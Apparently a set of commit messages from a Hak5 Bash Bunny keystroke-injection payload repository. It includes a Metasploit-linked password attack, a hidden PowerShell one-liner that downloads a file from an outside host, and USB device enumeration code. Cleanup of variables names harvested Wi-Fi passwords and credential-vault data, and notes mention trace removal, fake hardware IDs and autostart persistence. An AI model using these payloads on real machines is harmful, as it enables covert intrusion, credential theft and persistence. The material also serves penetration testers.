* Adding Jackalope, a Bunny+Metasploit chimera project.
* Fixing inaccurate documentation.
* Generate the password entry payload on the alternate switch.
* Additional documentation concerning alternate payload mechanism.
* Branding
* Update readme.md
* rearchitecting payload to be independent. No longer overwrites alternate payload location. Uses WAIT interface to interact with the tester to reuse a password, clear the password, and re-attack the machine.
* Response to Hak5 2506
* A random 'e' ended up on line 58.
Line is blank now like it is supposed to be.
* Created readme
STAGE2 made more sense when it was STAGE1/STAGE2, but the transcoding is a special stage and the typing is stage 2 since the transcoding had to be done first.
Some more shortening. Only 183 characters!
powershell -w h "$p=$home+'\b.jpg';iwr h4k.cc/b.jpg -O $p;SP 'HKCU:Control Panel\Desktop' WallPaper $p;1..59|%{RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1}"
* Omit http:// from URI
* powershell -w h to start a hidden powershell windows
* set variable $p for later re-use (saves characters)
* Omit -Uri and redundant characters in -Outfile (-O)
switches
* 1..59|% to create a loop for 60 seconds
* use $home as directory
Gets COM& Serial Device PID&VID if doing a walk about and want to collect info on HID/PID&VID + MI for future use. just a thought
#Get - Com & Serial Devices
$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table
"COM & SERIAL DEVICES"
"==================================================================" + ($COMDevices | Out-String)
""
Removes all Variables created during the session. I noticed my version of PS was storing them between simulated attacks. so removing them entirely was my resolve.
Remove-Variable -Name computerPubIP,
computerIP,IsDHCPEnabled,Network,Networks,
computerMAC,computerSystem,computerBIOS,computerOs,
computerCpu, computerMainboard,computerRamCapacity,
computerRam,driveType,Hdds,RDP,WLANProfileNames,WLANProfileName,
Output,WLANProfileObjects,WLANProfilePassword,WLANProfileObject,luser,
process,listener,listenerItem,process,service,software,drivers,videocard,
vault -ErrorAction SilentlyContinue -Force
- Clean up traces
- Bugfixes on newer firmware
- Improved documentation
- Fake hardware identifier
- Added persistence via autostart
- Disconnect on end
